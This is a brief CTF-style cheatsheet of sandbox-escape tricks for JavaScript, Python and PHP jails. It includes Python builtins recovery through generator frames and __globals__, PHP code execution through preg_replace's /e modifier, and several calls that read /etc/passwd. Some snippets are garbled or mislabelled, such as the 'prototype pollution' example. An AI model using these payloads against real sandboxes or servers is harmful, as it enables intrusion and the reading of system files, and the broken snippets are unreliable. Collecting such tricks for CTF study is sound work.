Fuck Jails

Js Cheatsheet

// Without letters
[[]]+[]+!=[]

// Equality
alert(1) == alert`1`
this == this.constructor

global.car = 'DeLorean';
this.car === global.car

// Prototype pollution
global.car = 'DeLorean';
this.car = 'Batmobile';
global.car === 'Batmobile';

// Constructor injection
function Car() {
  this.car = 'Batmobile'
}
const car = new Car();
car.car === 'Batmobile';

Pyjail Cheatsheet


(lambda:...).__globals__

# obtain builtins from generators
(_ for _ in ()).gi_frame.
(await _ for _ in ()).ag_frame.f_builtins

@exec
@input
def a():
Can be class
  pass

# walrus operator (>= python3.8)
+
[a:=().__doc__, print(a)]
-
(lambda a: print(a))(().__doc__)

Php Cheatsheet

// Is this a string ?
$obfs = "1"; //string "1"
$obfs++; //int 2

RCE via preg_replace()
preg_replace(pattern,replace,base);
preg_replace("/a/e","phpinfo()","x")

// Can we read /etc/passwd ?
file_get_contents("/etc/passwd");
readfile("/etc/passwd");
fopen("/etc/passwd","r");
include("/etc/passwd");
require_once("/etc/passwd");

Docs